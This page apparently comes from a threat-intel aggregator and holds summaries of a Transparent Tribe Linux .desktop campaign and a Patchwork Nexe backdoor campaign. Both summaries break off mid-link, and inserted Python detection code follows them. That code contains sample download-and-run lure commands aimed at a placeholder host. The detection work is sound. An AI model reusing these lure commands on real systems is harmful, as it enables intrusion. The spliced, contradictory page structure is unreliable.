One Article Review

Source RiskIQ
Identifier 8586788
Publication date 2024-09-27 19:44:31 (viewed: 2024-09-27 20:18:06)
Title OSINT Investigation: Hunting Malicious Infrastructure Linked to Transparent Tribe
(Repost)
Text
#### Targeted Geolocations
- India
#### Targeted Industries
- Government agencies and services
## Snapshot
Researchers at Cyfirma have identified malicious infrastructure operated by Transparent Tribe, also known as APT36.
## Description
This infrastructure comprises 15 malicious hosts hosted at DigitalOcean, running Mythic C2 servers. Transparent Tribe uses the Mythic exploitation framework, originally designed for red teaming, to manage compromised systems. The group targets individuals in India, likely government officials, by distributing Linux desktop entry files disguised as PDFs. These files download and execute Mythic Poseidon agents, Golang binaries built for Linux and macOS x64, which let the threat actors establish persistence and evade detection.

Transparent Tribe is known for its persistent and evolving methods, and this campaign demonstrates its increased targeting of Linux environments, particularly those used by the Indian government. Cyfirma notes that these findings emphasize the need for heightened vigilance and proactive defense measures against such sophisticated and adaptive threats.
## Additional Analysis
Operational since 2013, [Transparent Tribe](https://attack.mitre.org/groups/g0134/) is a Pakistan-based threat group that primarily targets the Indian government, defense, and education sectors. The group's main motivation is conducting cyberespionage, and it leverages a variety of tools to achieve this goal, including custom RATs targeting Windows, weaponized open-source C2 frameworks, trojanized installers impersonating applications, and phishing sites designed to target Indian government officials. The group has been observed using a variety of malware, including ElizaRAT, CapraRAT, Poseidon, CrimsonRAT, ObliqueRAT, DarkComet and Peppy, among others.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [network protection](https://learn.microsoft.com/en-
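As an added illustration (not code from the report or from Cyfirma), the following Python routine triages the Linux desktop entry lure described above: it parses a .desktop file and reports the traits that separate a document-disguised launcher from an ordinary one. The sample entries, the placeholder URL and the finding names are constructed for this example.

```python
import configparser
import re

# Document extensions a launcher would impersonate, and icon names that make
# a file manager render the launcher as a document.
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
DOC_ICONS = {"application-pdf", "x-office-document", "pdf", "evince", "okular"}
FETCH_RE = re.compile(r"\b(curl|wget)\b.*https?://")
STAGE_RE = re.compile(r"(/tmp/|/dev/shm/|/var/tmp/|\$HOME/\.|~/\.)")

def triage_desktop_entry(filename: str, text: str) -> list[str]:
    """Reasons a .desktop file looks like a document-disguised launcher ([] = clean)."""
    cp = configparser.RawConfigParser()  # no %-interpolation: Exec uses %U, %f
    cp.optionxform = str                  # keep key case (Name, Exec, Icon)
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return ["no [Desktop Entry] section"]
    entry = cp["Desktop Entry"]
    name = entry.get("Name", "")
    exec_line = entry.get("Exec", "")
    icon = entry.get("Icon", "").lower()
    findings = []
    if any(filename.lower().endswith(ext + ".desktop") for ext in DOC_EXTS):
        findings.append("filename uses a document double extension")
    if any(name.lower().endswith(ext) for ext in DOC_EXTS):
        findings.append("Name field mimics a document filename")
    if icon in DOC_ICONS:
        findings.append("Icon makes the launcher render as a document")
    if FETCH_RE.search(exec_line):
        findings.append("Exec downloads from a remote URL")
    if STAGE_RE.search(exec_line):
        findings.append("Exec stages or runs a payload from a temp or hidden path")
    if findings and entry.get("Terminal", "false").lower() == "false":
        findings.append("Terminal=false hides the command from the user")
    return findings

# Constructed samples (not from the report): a lure shaped like the technique
# described above, and an ordinary application launcher for comparison.
LURE = """[Desktop Entry]
Name=Meeting_Agenda.pdf
Icon=application-pdf
Terminal=false
Exec=/bin/sh -c "wget -q -O /tmp/.agenda http://placeholder.invalid/a && sh /tmp/.agenda"
"""
BENIGN = """[Desktop Entry]
Name=Text Editor
Icon=accessories-text-editor
Exec=gedit %U
"""
```

Run `triage_desktop_entry("Meeting_Agenda.pdf.desktop", LURE)` to see all six findings fire, while the editor launcher returns an empty list.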
Rating ★★★
Sent Yes
Tags Ransomware Malware Tool Threat Mobile
Stories APT 36


Reposts of the article (1):
Source RiskIQ
Identifier 8586752
Publication date 2024-09-27 18:16:10 (viewed: 2024-09-27 19:18:18)
Title Nexe Backdoor Unleashed: Patchwork APT Group's Sophisticated Evasion of Defenses
Text
#### Targeted Geolocations
- China
- Bhutan
## Snapshot
Cyble Research and Intelligence Labs (CRIL) has identified an ongoing campaign by the Patchwork APT group, also known as Dropping Elephant, targeting Chinese entities with a sophisticated backdoor named "Nexe." The group, active since 2009 and believed to be based in India, is known for cyber espionage and has been focusing on government, defense, and diplomatic entities across South and Southeast Asia.
## Description
The initial infection vector for this campaign uses a malicious LNK file, likely distributed via phishing emails, which executes a PowerShell script to download a decoy PDF and a malicious Dynamic Link Library (DLL). Cyble has identified three distinct LNK files: two that likely target Chinese entities, while the third seems aimed at organizations in Bhutan. The malware uses DLL sideloading, where the legitimate system file “WerFaultSecure.exe” is exploited to load the malicious DLL, helping to obscure its presence. The DLL executes shellcode that patches APIs like AmsiScanBuffer and EtwEventWrite to bypass detection, allowing the malware to steal sensitive information. The final payload collects system data, including IP addresses, usernames, and device details, which are then encrypted and sent to a command-and-control server.

Patchwork's evolving tactics and use of sophisticated evasion techniques, such as API patching and in-memory execution, highlight the group's advanced capabilities and pose significant challenges to targeted organizations. According to Cyble, Patchwork's ability to circumvent traditional security measures underscores the persistent threat they pose in cyber espionage operations.
## Additional Analysis
Patchwork is known for its spear phishing and watering hole attacks that aim to gather intelligence from aviation, defense, energy, financial, government, information technology, media, and non-governmental organizations (NGOs).

The group has been observed using [BADNEWS](https://attack.mitre.org/software/S0128/) remote access trojan (RAT), [VajraSpy](https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/), [QuasarRAT](https://attack.mitre.org/software/S0262/), and [TINYTYPHON](https://attack.mitre.org/software/S0131/). A recent campaign [observed by ESET](https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/) saw the group distributing malicious apps bundled with VajraSpy in the Google Play Store, likely targeting Pakistani users.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security
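As an added example (not code from the report, Cyble or Microsoft), the following Python detection logic covers the infection chain described above: an LNK-launched PowerShell downloader, a copy of WerFaultSecure.exe outside the system directories, and WerFaultSecure.exe loading a DLL from a user-writable path. It assumes Sysmon-style event dictionaries; the sample events, user name, placeholder URL and DLL name are constructed.

```python
import ntpath
import re

# Sysmon-style event fields are assumed (EventID 1 = process creation,
# EventID 7 = image load); any SIEM schema with the same fields works.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
PS_SUSPICIOUS = re.compile(
    r"-w(indowstyle)?\s+hidden|-enc\w*\s|downloadfile|invoke-webrequest|\biwr\b|\.pdf\b", re.I)

def in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)

def evaluate_event(ev: dict) -> list[str]:
    """Names of the detections that fire on a single event ([] = nothing)."""
    hits = []
    image = ev.get("Image", "")
    exe = ntpath.basename(image).lower()
    if ev.get("EventID") == 1:
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        if exe in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
                and PS_SUSPICIOUS.search(ev.get("CommandLine", "")):
            hits.append("lnk_launched_powershell_downloader")
        if exe == "werfaultsecure.exe" and not in_system_dir(image):
            hits.append("werfaultsecure_copied_outside_system_dir")
    elif ev.get("EventID") == 7 and exe == "werfaultsecure.exe":
        if not in_system_dir(ev.get("ImageLoaded", "")):
            hits.append("werfaultsecure_sideloaded_dll")
    return hits

def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> detections, keeping only the events that fired."""
    return {i: h for i, ev in enumerate(events) if (h := evaluate_event(ev))}

# Constructed sample events (not from the report): the chain above, then two benign events.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr http://placeholder.invalid/a -OutFile $env:TEMP\agenda.pdf"'},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\WerFaultSecure.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\WerFaultSecure.exe"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\WerFaultSecure.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\sideload.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\WerFaultSecure.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
]
```

`scan(SAMPLE_EVENTS)` flags the first three events and leaves the legitimate WerFaultSecure.exe load and the plain interactive PowerShell launch untouched.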
Rating ★★★
Sent Yes
Tags Ransomware Malware Tool Threat Patching
Stories


The article does not appear to be a repost of an earlier one.